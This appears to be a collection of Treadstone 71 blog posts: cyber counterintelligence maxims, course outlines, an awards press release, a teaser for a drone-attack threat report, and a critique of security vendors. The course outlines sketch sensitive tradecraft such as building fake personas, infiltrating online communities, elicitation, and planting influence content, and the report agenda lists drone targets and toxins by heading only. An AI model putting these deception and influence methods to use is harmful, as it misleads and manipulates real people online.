    2. Cyber intelligence is the basis for cyber counterintelligence. Learning your adversary prepares an organization for counter denial and counter-deception.
  2. Honor your profession
    1. Learn about intelligence analysis. Leave your security comfort zone
    2. Take classes in critical thinking. It is never too late.
  3. Own the street
    1. Establish a presence on the same sites as your adversaries.
    2. Create multiple personas when doing so.
  4. Know your history
    1. The adage of ‘know your history or be destined to repeat it’ is in effect.
    2. Know what your adversaries have done to determine what they may do.
  5. Do not ignore analysis
    1. Analysis is not grown from a server but resides in human skill.
    2. Until artificial intelligence is with us, the human mind serves as the best solution for intelligence analysis (if properly trained).
  6. Do not be parochial
    1. Share data even if you must do this via back channels. We do not advocate breaking corporate rules by sharing sensitive data.
    2. Quid pro quo sharing is required.
  7. Train your people
    1. Understand your needs, understand the timing of those needs, and drive for increased training budgets.
    2. The best investment you can make is in yourself.
  8. Do not be shoved aside
    1. Gently push your way into business meetings establishing a ‘listening tour’
    2. Clarify what intelligence is and is not.
  9. Do not stay too long
    1. Fully document your actions while periodically shifting targeting assignments to stay fresh.
    2. Rotate assignments to learn every facet of the intelligence game.
  10. Never give up (Bardin, 2011) B2
    1. Perseverance and patience are required.
    2. Our adversaries do not operate under the same rules of engagement that hamper our actions.

One last item we must avoid is where we are placing intelligence in our organizations. We are repeating history with the mistake of placing Intel in the SOC or as part of incident response. This is akin to putting infosec under IT operations buried within the CIO’s organization. Intelligence is not a technical issue any more than security. If we continue down the path, we will create more fault lines.


Much like information security a short 15 years ago, cyber intelligence is in its infancy and largely misunderstood. We are rife with fallacies, inaccurate definitions, and terminology usage. The profession of intelligence should not be confused with security and should not be clouded by poor and biased reporting. The only way to change the problems inherent in intelligence today is to drive that change internally while forcing the market to shift. The CIA realized this years ago striving to create the ‘profession of intelligence analysis.’ The framework of intelligence can and should be the underlying standard for intelligence planning and program builds.

This comes with frequent constructive criticism of vendor delivered products and services. I have always said the best investment you can make in life is in yourself. Organizations should consider doing the same. Educate your staff. Plan your program. Drive the change from the inside.

For a summary of this article, see the conclusion at the beginning.

Jeff Bardin

Treadstone 71©

Citations

Agency, C. I. (2007, April 25). Offices of the CIA. Retrieved from Central Intelligence Agency – Training Resources: https://www.cia.gov/offices-of-cia/intelligence-analysis/training-resources.html

Bardin, J. (2011). The Ten Commandments of Cyber Counterintelligence. Boston: CSO Online.

Davis, J. (2007, April 21). Sherman Kent and the Profession of Intelligence Analysis. Retrieved from CIA Library: https://www.cia.gov/library/kent-center-occasional-papers/vol1no5.htm

Gabbard, T. a. (2008). Assessing the Tradecraft of Intelligence Analysis. Retrieved from Rand Corporation Published Research: https://www.rand.org/content/dam/rand/pubs/technical_reports/2008/RAND_TR293.pdf

Gartner. (2013, May 13). Threat Intelligence. Retrieved from Gartner Definition: Threat Intelligence: https://www.gartner.com/doc/2487216/definition-threat-intelligence

Government, U. (2013, October 22). Joint Intelligence. Retrieved from http://www.dtic.mil/doctrine/new_pubs/jp2_0.pdf

Government, U. (2013, February 21). Office of the Director National Intelligence. Retrieved from www.dni.gov

Hames, J. (2014, September). Strategic Trickery: The U.S. Army’s Use of Tactical Deception. Retrieved from Soldiers – The Official U.S. Army Magazine: http://soldiers.dodlive.mil/2014/09/strategic-trickery-the-u-s-armys-use-of-tactical-deception/

Hanson, J. (2015). The Admiralty Code – A Cognitive Tool for Self-Directed Learning. Sydney: JM Hanson. Retrieved from www.ijlter.org/index.php/ijlter/article/download/494/234

InfoSecurity, M. (2015). Threat Intelligence: Collecting, Analysing, Evaluating. London: MWR InfoSecurity. Retrieved from https://www.mwrinfosecurity.com/assets/Whitepapers/Threat-Intelligence-Whitepaper.pdf

Katherine Hibbs Pherson, R. H. (2012). Critical Thinking for Strategic Intelligence. Thousand Oaks: CQ Press.

Security, N. (2016, September 9). Threat Intelligence Defined – 1260wp. Retrieved from Threat Intelligence Defined – Solutionary: https://www.solutionary.com/_assets/pdf/white-papers/threat-intelligence-defined-1260wp.pdf

University of New England. (2011, June 29). Cognitive Psychology – Data, Information, and Knowledge – Lecture Notes. Retrieved from University of New England Mathematics, Statistics and Computer Science: http://turing.une.edu.au/~comp292/Lectures/HEADER_KM_2004_LEC_NOTES/node4.html

 


INSA Opens Nominations for 2017 Achievement Awards

FOR IMMEDIATE RELEASE

Contact: Ryan Pretzer
(703) 224-4672
rpretzer@insaonline.org

Nominations sought from the IC, private sector, and academia for national security professionals exhibiting great promise

Nominations due Monday, October 31, 2016; six recipients to be recognized in winter 2017 ceremony

ARLINGTON, VA (August 29, 2016) – Members of the intelligence and national security communities are encouraged to nominate their peers and partners from government, private industry, and academia for the 2017 Achievement Awards, the Intelligence and National Security Alliance (INSA) has announced. The Achievement Awards recognize up-and-coming leaders and mentors serving or supporting the U.S. national security mission. The six awards and eligibility criteria are as follows:

  • Joan A. Dempsey Mentorship Award – Nominees would come from public, private and academic elements up to and including GS-15/0-6 and equivalent rank.  
  • Sidney D. Drell Academic Award – Nominees would include graduate students and untenured professors.
  • Richard J. Kerr Government Award – Nominees would be civilian government employees up to and including GS-13 and equivalent rank.
  • William O. Studeman Military Award – Nominees would be uniformed military personnel up to and including 0-3/E-6.
  • Edwin H. Land Industry Award – Nominees would include contractors and nongovernment employees with 8-10 years of non-executive experience.
  • John W. Warner Homeland Security Award – Nominees would include law enforcement personnel, intelligence analysts and first responders from the federal government and state, local, tribal and territorial (SLTT) partners.

The Achievement Awards program has recognized employees from the Defense Intelligence Agency, Drug Enforcement Administration, FBI, National Nuclear Security Administration, National Security Agency, Northrop Grumman, Oak Ridge National Laboratory, Office of Naval Intelligence, U.S. Coast Guard, U.S. Secret Service, and Vencore, among other organizations in recent years.

INSA Chairman Tish Long said, “INSA is very proud to again host the Achievement Awards. This program represents something we as a community must embrace: recognizing and investing in the amazing young professionals who will be responsible for protecting our nation in the future and are contributing to that mission today. I urge all leaders in our intelligence and national security communities to submit nominations on behalf of the rising stars in their organizations.”

The INSA Board of Directors established the Achievement Awards in 2010 to recognize the accomplishments of entry- and mid-level professionals and mentors working in intelligence and national security. The six awards are each named after a recipient of the William Oliver Baker Award.

Both online and printable versions of the nomination form are available at www.insaonline.org/Achievement. Instructions to submit nominees who would require a classified nomination are available by contacting INSA at achievement@insaonline.org.

Nominations for all awards will be accepted through Friday, October 31, 2016. Recipients will be acknowledged at the 2017 Achievement Awards reception; more details about the reception will be released at a later date.

###

About INSA
The Intelligence and National Security Alliance (INSA) is the premier intelligence and national security organization that brings together the public, private and academic sectors to collaborate on the most challenging policy issues and solutions. As a nonprofit, nonpartisan, public-private organization, INSA’s ultimate goal is to promote and recognize the highest standards within the national security and intelligence communities. INSA has 160 corporate members and several hundred individual members who are leaders and senior executives throughout government, the private sector and academia.

Join us at the 2016 ISSA International Conference!

Survival Strategies in a Cyber World
November 2-3, 2016
Hyatt Regency Dallas
Dallas, TX, USA
#ISSAConf

Building a Mature Cyber Intelligence Program 11/2/2016, 4:00 pm – 4:45 pm, Cumberland I/J

http://www.issa.org/?issaconf_home

Many organizations claim to be creating intelligence for their corporate stakeholders. Most believe technology solutions provide the same. Tools, techniques, and protocols / procedures of adversaries are nothing more than data and information unless properly collected, produced, organized, analyzed and disseminated. This discussion covers how to establish the proper strategy using proven intelligence tradecraft methods. We will cover areas of vision, mission, goals and initiative. The discussion guides the attendees through the process of developing methods of collection and outlines areas for producing intelligence using structured analytic techniques while extracting the required issues from leadership for focused delivery. Jeff Bardin: Chief Intelligence Officer, Treadstone 71. @treadstone71llc

https://c.ymcdn.com/sites/www.issa.org/resource/resmgr/2016_International_Conference/Detailed_Agenda_2016.pdf

Treadstone 71 Cyber Intelligence and Counterintelligence – Course Overviews and Dates

The information below provides non-inclusive overviews of Treadstone 71 courses. The courses are listed in order of suggested training. Courses may be taken separately or as a package. Course requests and modifications are acceptable. Courses are based upon intelligence and intelligence analysis tradecraft.

Upcoming Classes

SIGN UP – Next class November 29-December 2 in the DC METRO area for the Cyber CounterIntelligence Tradecraft Course – http://www.planetreg.com/CounterIntel

For more information: osint@treadstone71.com or 888.714.0071

Cyber Intelligence Tradecraft Certification

This course is highly specialized following intelligence community tradecraft. If you want purely technical, then this is not the course for you. If you want tradecraft that lays the foundation for a solid program, education that creates a lasting impact, then this is the course for you.

Your enemies scour blogs, forums, chat rooms and personal websites to piece together information that is used to harm the government and commercial organizations. Learning about cyber intelligence, OSINT and Cyber-OPSEC effectively equips students with the tools to gather data points and transform these data points into actionable intelligence that prevents targeted attacks.

The course includes:

CYBINT1 – Collection Methods and Techniques, Collection Planning, PIRs, Collection Process Flow, Collection Tools and Targeting, Alignment with Hunt and Detect Needs, Ties to CSIRT, TTPs, IoCs, Threat Intelligence, Open Source Intelligence, All-Source Intelligence, Standard Glossary and Taxonomy – (Case Study 1)

CYBINT2 – Organization, Production, and Structured Analytic Techniques, Use of Techniques, Production Management, Critical Thinking, Process Flow, Metrics, Intake forms, and templates – (Case Study 2)

CYBINT3 – Types and Methods of Analysis, Decomposition, Recomposition, Methods for Fusion, Case Studies in Analysis, Cognitive Bias, Credibility and Reliability of Sources, Confidence Levels, Analysis of Competing Hypotheses, Flow into Hunt, Detect, CSIRT, TTPs, IoCs, Inductive/Abductive/Deductive Reasoning, Historic trending and campaign analysis, Intelligence for organizational resilience.

CYBINT4 – Table Top Exercises (TTXs), Identifying Your Consumers, Stakeholder Identification, and Analysis, Standing Orders from Leadership, Analytic Writing, BLUF, AIMS, Types of Reports, Product Line Mapping / Report Serialization, and Dissemination, Cyber and Threat Intelligence Program Strategic Plan, Goals, Objectives. Case Study Presentations

Lecture, Hands-on, Apprenticeship, in class exercises, student presentations, analytic products, templates, course material—40 CPEs (5-days – 40 hours)

All Case Studies use all methods, techniques, and tools referenced in the course material. The Case Studies used are straight from the headlines giving students real world experience during the class.

Cyber Counterintelligence

This course presents the student with foundational concepts and processes in the discipline of cyber counterintelligence with a focus on cyber counterintelligence missions, defensive counterintelligence, offensive counterintelligence, and counterespionage as these realms apply to traditional tradecraft, and how they are or will evolve into the cyber domain. By starting with traditional counterintelligence and progressing to cyber counterintelligence, the student will develop an appreciation for collection efforts, exploitation of potential threats, insider concerns, and the risks and benefits of counterintelligence.

With the growing need for comprehensive and timely intelligence for nations as well as businesses, the student will explore the essential elements that make up the intelligence cycle with a focus on how these pivotal points are exploited. As part of this class, the exploration of the continued importance of critical thinking as well as out-of-the-box analysis will be heavily leveraged to improve the critical-thinking skills of the students. As cyber topics continue to evolve, the importance of cyber intelligence is growing, and as such the protection of our intelligence cycles will expand as well, emphasizing the growing need to ensure our processes are not compromised in a cyber-dominated landscape. Cyber Counterintelligence is one aspect and possibly one of the most crucial topics at the core of protecting our collection efforts. The potential for active defense or offensive cyber counterintelligence operations will be covered.

The course will rely heavily on individual research and group discussion to explore the world of cyber counterintelligence, and where applicable, make use of the student’s ability to do independent thinking and analysis of in-class problems assigned through weekly discussion threads. This course focuses on open source intelligence and adversaries while creating online personas to assist in data collection and information extraction. This introductory course examines open source intelligence collection as well as the availability and use of OSINT tools. Students will be able to understand the methods of online anonymity, the fundamentals behind cyber persona development, enrollment in various social media sites and applications, and how these current methods can be employed in their organizations to assist in operational cyber security, their defense against adversaries, and passive data collection. The establishment of cyber personas takes patience and time to create a credible resource. Parallel activities occur through the outline above. Treadstone 71 maintains separation from the client as required, maintaining confidentiality of methods and processes.

Sitreps and current intelligence may redirect activities. The intent is to establish a program of cyber and open source intelligence that creates data streams for analysis. Data streams take time to develop in order to establish links, trends, tendencies and eventually, anticipatory and predictive analysis. The desire is to move from a detective approach to one that is preventive while moving to predictive.

osint@treadstone71.com

888.714.0071

Treadstone 71 Cyber Intelligence, Counterintelligence, and Target-Centric OSINT Course Overviews

The information below provides non-inclusive overviews of Treadstone 71 courses. The courses are listed in order of suggested training. Courses may be taken separately or as a package. Course requests and modifications are acceptable. These are high-level outlines. The courses teach intelligence tradecraft with a focus upon intelligence analysis, methods, tactics, techniques, procedures, and operational security (OPSEC).

Upcoming Classes

For more information: osint@treadstone71.com or 888.714.0071

Cyber Intelligence Tradecraft Certification

This course is highly specialized following intelligence community tradecraft. If you want purely technical, then this is not the course for you. If you want tradecraft that lays the foundation for a solid program, education that creates a lasting impact, then this is the course for you.

Your enemies scour blogs, forums, chat rooms and personal websites to piece together information that is used to harm the government and commercial organizations. Learning about cyber intelligence, OSINT, and Cyber-OPSEC effectively equips students with the tools to gather data points and transform these data points into actionable intelligence that prevents targeted attacks.

The course includes:

CYBINT1 – Collection Methods and Techniques, Collection Planning, PIRs, Collection Process Flow, Collection Tools and Targeting, Alignment with Hunt and Detect Needs, Ties to CSIRT, TTPs, IoCs, Threat Intelligence, Open Source Intelligence, All-Source Intelligence, Standard Glossary and Taxonomy – (Case Study 1)

CYBINT2 – Organization, Production, and Structured Analytic Techniques, Use of Techniques, Production Management, Critical Thinking, Process Flow, Metrics, Intake forms, and templates – (Case Study 2)

CYBINT3 – Types and Methods of Analysis, Decomposition, Recomposition, Methods for Fusion, Case Studies in Analysis, Cognitive Bias, Credibility and Reliability of Sources, Confidence Levels, Analysis of Competing Hypotheses, Flow into Hunt, Detect, CSIRT, TTPs, IoCs, Inductive/Abductive/Deductive Reasoning, Historic trending and campaign analysis, Intelligence for organizational resilience.

CYBINT4 – Table Top Exercises (TTXs), Identifying Your Consumers, Stakeholder Identification, and Analysis, Standing Orders from Leadership, Analytic Writing, BLUF, AIMS, Types of Reports, Product Line Mapping / Report Serialization, and Dissemination, Cyber and Threat Intelligence Program Strategic Plan, Goals, Objectives. Case Study Presentations

Lecture, Hands-on, Apprenticeship, in class exercises (3 Live Case Studies), student presentations, analytic products, templates, course material—40 CPEs (5-days – 40 hours)

All Case Studies use all methods, techniques, and tools referenced in the course material. The Case Studies used are straight from the headlines giving students real world experience during the class.

Cyber Counterintelligence http://www.planetreg.com/CounterIntel

This course presents the student with foundational concepts and processes in the discipline of cyber counterintelligence with a focus on cyber counterintelligence missions, defensive counterintelligence, offensive counterintelligence, and counterespionage as these realms apply to traditional tradecraft, and how they are or will evolve into the cyber domain. By starting with traditional counterintelligence and progressing to cyber counterintelligence, the student will develop an appreciation for collection efforts, exploitation of potential threats, insider concerns, and the risks and benefits of counterintelligence.

With the growing need for comprehensive and timely intelligence for nations as well as businesses, the student will explore the essential elements that make up the intelligence cycle with a focus on how these pivotal points are exploited. As part of this class, the exploration of the continued importance of critical thinking as well as out-of-the-box analysis will be heavily leveraged to improve the critical-thinking skills of the students. As cyber topics continue to evolve, the importance of cyber intelligence is growing, and as such the protection of our intelligence cycles will expand as well, emphasizing the growing need to ensure our processes are not compromised in a cyber-dominated landscape. Cyber counterintelligence is one aspect and possibly one of the most crucial topics at the core of protecting our collection efforts. The potential for active defense or offensive cyber counterintelligence operations will be covered. The course will rely heavily on individual research and group discussion to explore the world of cyber counterintelligence, and where applicable, make use of the student’s ability to do independent thinking and analysis of in-class problems assigned through weekly discussion threads.

Cyber CI Team Presentations: Cyber Infiltration, Information Operations, Information Support Operations

  • National Counterintelligence Strategy
  • Standard Glossary and Taxonomy
  • Mission Based Counterintelligence
  • Counter Collection and Anticipation
  • Denial and Deception
  • Counter-Denial and Deception
  • Cyberspace
  • The Cyber Persona Layer
  • Perception as Deception
  • Social Psychology
  • Differences in Culture
  • Hofstede Dimensions
  • Includes open source tool usage
  • Persona creation, establishment, maintenance, expansion (depending upon taking Cyber Intelligence Course)
  • Data collection – recycle for Cyber CI updates/improvements
  • Authoring of blogs and articles for influencing
  • Placement of specific concepts and phrases
  • Target profiles – dossiers
  • Target gap analysis
  • Clearly define the mission so that it aligns with organizational objectives
  • Clandestine Collection
    • Operation
    • Surveillance
    • Counter Surveillance
    • CI Activities
    • CI Analysis and Production
    • CI Analysis Reporting
      • Support Brief
      • Source Evaluation
      • Operational analysis report
      • Asset Evaluation
      • Support Package
      • CI Assessment
      • CI Campaign
        • Mission
        • Mission Management
        • Operations
      • Effects-Based Operations
      • Functions and Services
    • CI Insider Threat
      • Investigations
    • Prepare an estimate of the situation
      • Prepare the plan
        • Support Plan
      • Cyber Media selection
      • Snuggling
      • Internet OPSEC
      • Product development
      • Pretesting – determines the probable impact on the target audience
      • Production and dissemination of material
      • Implementation
      • Post-testing evaluation of audience responses
      • Feedback
    • Ten Commandments of Cyber Counterintelligence
      • Be offensive
      • Honor your profession
      • Own the street
      • Know your history
      • Do not ignore analysis
      • Do not be parochial
      • Train your people
      • Do not be shoved aside
      • Do not stay too long
      • Never give up
    • Research and analyze methods of influencing adversaries from a variety of information sources
    • Team/Individual Presentations

Lecture, Hands-on, Apprenticeship, in class exercises (Live Case Studies), student presentations, templates, course material—30 CPEs 4-days

All Case Studies use all methods, techniques, and tools referenced in the course material. The Case Studies used are straight from the headlines giving students real world experience during the class.

Target-Centric Open Source Intelligence

This course focuses on open source intelligence and adversaries while creating online personas to assist in data collection and information extraction. This introductory course examines open source intelligence collection as well as the availability and use of OSINT tools. Students will be able to understand the methods of online anonymity, the fundamentals behind cyber persona development, enrollment in various social media sites and applications, and how these current methods can be employed in their organizations to assist in cyber operational security, their defense against adversaries, and passive data collection. The establishment of cyber personas takes patience and time in order to create a credible resource. Parallel activities occur through the outline above. Treadstone 71 maintains separation from the client as required, maintaining confidentiality of methods and processes. Sitreps and current intelligence may redirect activities. The intent is to establish a program of cyber and open source intelligence that creates data streams for analysis. Data streams take time to develop in order to establish links, trends, tendencies and eventually, anticipatory and predictive analysis. The desire is to move from a detective approach to one that is preventive while moving to predictive.

Adversaries scour blogs, forums, chat rooms and personal websites to piece together information that is used to harm the government and commercial organizations. Learning about cyber intelligence, OSINT, and Cyber-OPSEC effectively equips students with the tools to gather data points and transform these data points into actionable intelligence that prevents targeted attacks. Students will learn methods to create and manage personas while passively gathering information leading to cyber street credentials.

The course covers (non-inclusively):

  • Open Source Intelligence
    • Methods of collection
    • Specific tools
    • Social media sites and enrollment
  • Methods of Social Media Research
    • Tools and techniques
    • Social media demographics
    • Cyber Criminals
  • Social Psychology
    • Reciprocity
    • Consistency
    • Social validation
    • Liking
    • Authority
    • Scarcity
  • Differences in Culture
    • Diversity
    • What is …
  • Hofstede Dimensions
  • Big 5 Theory of Personality
  • Information Warfare and Cyber Psychological Operations
    • Target analysis and message manipulation where applicable
  • Establish Priority Intelligence Requirements
    • Establish Information Requirements
  • Persona creation and implementation
    • Cyber Persona Development and Maintenance
      • Leverage existing
      • Create new
      • Establish the storyline
      • Establish the plot synopsis
      • Storyline and plot synopsis
    • Story weaving and management
    • Snuggling
    • Collection
      • Linkages, trends, tendencies
    • Cyber Target Acquisition and Exploitation
      • Validation of target
      • Identify active adversary campaigns
      • Intent, Motivation, Goals, & Requirements.
    • Passive data collection
      • Campaign development
      • Target sites
        • Enrollment
      • Tactics, techniques, and procedures
      • Intent, motivation, goals, and requirements
      • Vectors of approach – Courses of action
      • Elicitation and exfiltration

Lecture, Hands-on, Apprenticeship, in class exercises (Live Case Studies), student presentations, templates, course material—30 CPEs 4-days

All Case Studies use all methods, techniques, and tools referenced in the course material. The Case Studies used are straight from the headlines giving students real world experience during the class.

osint@treadstone71.com 888.714.0071 http://www.planetreg.com/E76722275820

Drone Attack! Swarm with Hazardous Waste Payload

Once again the Team Flying Dragon from Kansas State University has created a critical intelligence estimate, this time, looking at drone attacks. The team consists of John Boesen, Randy Mai, Carrie Padgette, TL Vincent Salerno with oversight and tutelage from Professor Randall K. Nichols. 210 slides of detailed information focused on hazardous waste in the US and the use of drones to cause harm. The full report is available upon request from Treadstone 71 at osint@treadstone71.com – Please provide your name, title, and corporate / university / government email address for access to the report.

The Agenda

  • Executive Summary
  • Targets: Defenseless Universities (soft targets)
  • Hazardous Material Handling: PPE, antidotes, transport, logistics
  • Substances Used: toxins, location, transport, doses
  • Scenario
  • Consequences: effects, aftermath
  • Recommended Actions
  • Conclusions

Motive of Terrorist Organization implementing drone attacks

  • Armed, capable of targeting individuals, autos, structures
  • Highly effective at targets, maximize targets
  • Lower cost, risk, no risk to user/pilot
  • Punish, deter, disrupt, degrade, dismantle, defeat
  • Influence mass audience
  • Exceptionally effective in undermining populations
  • Alternative means when other activity cannot be accomplished, as attacking US military

This presentation examines, among other things, ethical and legal dimensions of on-line behavior regarding cyber security and UAS. It is not intended to turn counterterrorism, information technology or forensics investigators and professionals into lawyers. Many of the topics discussed will be concerned with the law and legal implications of certain behaviors.

Every effort is made to provide accurate and complete information. However, at no time during this presentation will legal advice be offered. Any student requiring legal advice should seek services of a lawyer authorized to practice in the appropriate jurisdiction.

This presentation is not about pushing the envelope or hacking, or trying out any of the UAS/UAV/Drone counter-terrorism approaches in our Cases or A/D scenarios in the field.

If you wish to see the complete presentation, contact Treadstone 71 at osint@treadstone71.com

Cyber Threat Intelligence – All-Source Intelligence – Successful Program Build

Treadstone 71 has a history of solving difficult security and intelligence issues. Recently we were approached by a very large firm to address their cyber intelligence and cyber threat intelligence issues. This organization (ORG A) had spent millions on cybersecurity vendors. The task given to these vendors included building an all-source intelligence program. They failed to deliver. ORG A performed a search to find an organization able to deliver on the promises of others. All recommendations pointed to Treadstone 71.

We assessed the situation and status, set to work on the issues, solved the problems, and built a functional program. Like all our clients, we cannot divulge the name, but we do have this reference that validates our claims of complete success:

reference

The program examined all-source intelligence and analytic doctrine from the cyber perspective following traditional tradecraft and lifecycle activities. We assisted and drove the building of intelligence strategic and program plans as well as methods to validate and communicate the plans. This laid the groundwork for an accepted and understood program that leadership approved. Our methods ensured success. The Treadstone 71 Cyber Intelligence Program includes:

  • Strategic Plan development, acceptance, and dissemination
    • Vision-Mission-Guiding Principles-Goals-Objectives
    • 18-Month Plan
  • Program Plan development, acceptance, dissemination, and implementation
  • Standard Operating Procedures—Tradecraft focused
    • Intelligence RACIs
    • Process flows and metrics
  • Priority Intelligence Requirements development
  • Strategic, operational, tactical, and technical intelligence
  • Collection Planning and Management
  • Passive Intelligence Collection
  • Production Planning and Management
  • Organization, Production, Processing – Decomposition
  • Methods of Analysis
  • Structured Analytic Techniques
  • Analytic Writing and Dissemination
  • Report Writing and Serialization
  • Virtual HUMINT Creation and Management
  • Internet Exposure Assessment – Attack Surface Analysis – Perception Management – Sentiment Analysis
  • Darknet, Forums, Social Networking, Closed Sites
  • Deception Detection and Credibility Analysis
    • Denial and deception identification
  • Competitive Intelligence Assessment and Program Analysis
  • Campaign Analysis with Recommendations and Opportunities

The Treadstone 71 Program ensures support for organizational mission and objectives while strengthening intelligence across the enterprise, something we accomplished with ORG A. The program validates intelligence vision, mission, goals, objectives and intelligence requirements. Treadstone 71 incorporates both revolutionary and evolutionary methods. We work with you to establish the framework for creating, improving and measuring your program, using methods proved with ORG A and other clients. Strategic goals and objectives are created and assigned. The program creates metrics, performance goals, milestones, and roadmaps. Treadstone 71 guides you through the journey, anticipating modifications and shifts. We offer training as well, with the next bootcamp scheduled for July 17-23 in Denver. The program helps you advance the enterprise intelligence program and standardize intelligence oversight, peer reviews, and governance as well as clear roles, responsibilities and job families. We also integrate with customer-facing organizations, providing advice and guidance on competitive intelligence. The bottom line is a happy client with all tasks accomplished. We can clean up the messes of the big boys or, you can hire us first to get the job done right, done once.

The Treadstone 71 program applies in-depth, substantive expertise, corporate and organizationally specific information and tough-minded tradecraft to produce and provide distinctive value-added recommendations and opportunities advancing corporate leadership’s needs while improving organizational business interests. Contact us now to learn how Treadstone 71 can transform your cyber and threat intelligence program. osint@treadstone71.com – 888.714.0071

http://www.treadstone71.com

The most dangerous thing in the world is a Second Lieutenant with a map and a compass.

The recent excuse by FireEye and other technology firms that their stock is tanking due to China not hacking is largely an unsupported and completely self-serving hypothesis. They offer no other hypothesis other than the one that gives them an excuse for selling products that do not work, for appeasing their stockholders and investors, and for delivering services steeped in see, detect, and arrest methods. FireEye bet the farm on typical perimeter sensors used to drive detection after the adversaries are in the client’s environment. They doubled down by buying Mandiant, an organization focused on putting ‘butts in seats’ for incident response. That would be seats in your organization at a very high cost. Incident response, another function based upon a defeatist mentality using a “kill chain” that kills the adversary and/or the malware that has already penetrated the environment. Much like letting an armed burglar into your home out of fairness and then starting a shootout. Now we see a CEO changeover that will surely drive the focus to more incident response marketing. Add that to the latest purchase of an overpriced iSight, a threat research firm that creates once and delivers many, and you have a recipe for poor stock performance. Congratulate Mr. Waters on getting out when he did and seeing that an IPO was not in the cards. iSight has even been asked by some firms to build threat intelligence capabilities. Something completely anathema to iSight’s strategy and something they are not capable of delivering in the first place. // We know. We have cleaned up what they have left behind. // They are a research firm. They create reports. They sell the same report to everyone.

The second part of their complete market arrogance is the statement (WSJ) that none of the 22 Chinese APT groups it tracks are actively attacking U.S. companies. So FireEye has built this huge capability across the globe yet only tracks 22 Chinese groups? // If a tree falls in a forest and no one is around to hear it, does it make a sound? // FireEye, CrowdStrike, Trend Micro, Checkpoint, Cylance, Palo Alto, HP, Symantec, and others continue to release reports on various groups they track. Do you really believe these groups will continue the same modes of operation once discovered? Is it not possible that the adversaries changed their protocols and tactics in response to the release of intelligence data on their actions? Is it possible that the archaic methods being used by these vendors will not pick up new methods laced with advanced tactics of denial and deception? Is it possible that these vendors are not seeing activity because they are not as good as they claim they are? The absence of evidence does not mean the activity does not exist. Keep publishing reports on adversaries, tipping your hand on what capabilities you do have and they are bound to make some changes. I guess that is why you call them advanced. Actually, -advanced- this is cyber espionage so let us call it what it is. Persistent only in the arrogance of such companies selling solutions that truly do not come close to solving the problem. Chest thumping and marketing reports serve to tip off the adversary, forcing them to become more devious, instituting wholesale changes in their approaches. Possibly to the point where you are not seeing the activity since you have not changed along with the adversary. // The enemy diversion you’re ignoring is their main attack. // We are at war. Who in war tells the enemy that their code has been cracked? That their tactics and methods have been discovered? Did the British divulge the fact that they had cracked the Enigma code? Of course not. They understood the value of intelligence and intelligence exploitation. They understood what was at stake. The cyber security market today is only interested in generating revenue.

WSJ – http://blogs.wsj.com/chinarealtime/2016/04/22/why-one-cybersecurity-firm-thinks-china-has-soured-on-hacking/

Many organizations continue to purchase the perimeter tools and sensors of the FireEyes and CrowdStrikes. The companies purchasing these products continue to lose data. Until we stop buying carpetbagger solutions we will not force change. We need to demand solutions that are truly preventive and predictive, not based upon malware reverse engineering or methods (kill chain) based upon see, detect, and arrest. // Professional soldiers are predictable; the world is full of dangerous amateurs. // We need to stop believing that companies with leadership trained only in law enforcement tactics truly understand intelligence tradecraft. We need to stop believing that companies with a pedigree in anti-virus understand intelligence tradecraft and offensive methods. We need to understand that stopping the adversary starts with not tipping them off. We need to stop believing that just because they are a big company, they actually know what they talk about. They don’t. They are just tasked with selling product.

Understand that the latest focus on ‘hunt and detect’ is merely an enhancement to the failed attempts at event correlation in SIEMs. Log aggregation and then analysis of the content for tactics, techniques, and procedures is but an improved method of finding adversaries and malware already in your environment. This is not proactive. This is not preventive, no matter what the vendors tell you. It is necessary but not new.

The adversary has changed yet the security technologies used to stop them are rooted in old and failed methods. Time to wake up and invest in something better.

One more area that needs attention is the actual reports coming out of these companies. They are not written in analytic form and format. They do not provide confidence levels. Most importantly, the market takes them at face value without citation of sources, reliability of sources, and credibility of the information. Even news organizations take them at face value. These are journalists who live and die by source and information validation. Actually, they should not be publishing these openly at all, but if they must, then we must demand validation of sources. Otherwise, we run the risk of another Norse. It is always interesting when revenues drop and market share suffers, then suddenly a new discovery is made on an adversary, resulting in a new, unsubstantiated report.

“Never interrupt your enemy when he is making a mistake.”

― Napoléon Bonaparte

“Always interrupt your vendor when they try to sell you snake oil.”

― T71

 

 


The Utilization and Management of Sockpuppets within Online Communities – Melissa Morris

Abstract

The Internet is the principal arena for online communication. Within the online community, individuals can choose who they are. If a member chooses an online identity that is something other than who they are in real life, then the identity created is a sockpuppet. The purpose of this research was to examine the utilization and management of sockpuppets within online communities. What are the ethical and legal boundaries in the use of sockpuppets within civilian online communities? What is the role of sockpuppets in the intelligence community? The intent behind sockpuppet use determines the ethical and legal boundaries within civilian online communities. If the intent is for entertainment and communication, online communities exhibit various levels of tolerance for ethical versus unethical choices of sockpuppets. However, legal boundaries are crossed if the intent is to do harm. The United States is not consistent with legislation involving sockpuppets. The intelligence community uses sockpuppets to assist in maintaining national security. A sockpuppet allows an analyst to infiltrate targeted online communities, and once inside to gather information about the group. Sockpuppets are accepted within the communities and gain a perspective similar to an offline undercover agent. It takes great effort and skill to create long-lasting and believable identities that effectively collect actionable intelligence. Conclusions generated based on a review of the current research include: federal legislation and management defining and clarifying criminal use of a sockpuppet, the creation of a best practices manual for the intelligence community to standardize training and utilization of sockpuppets, as well as continued study of the evolution of the sockpuppet.

You may download the paper (PDF) at the link below.

The Utilization and Management of Sockpuppets – Melissa Morris

Melissa may be reached at: mmorris537@gmail.com 

©Copyright 2014  by Melissa Morris All Rights Reserved
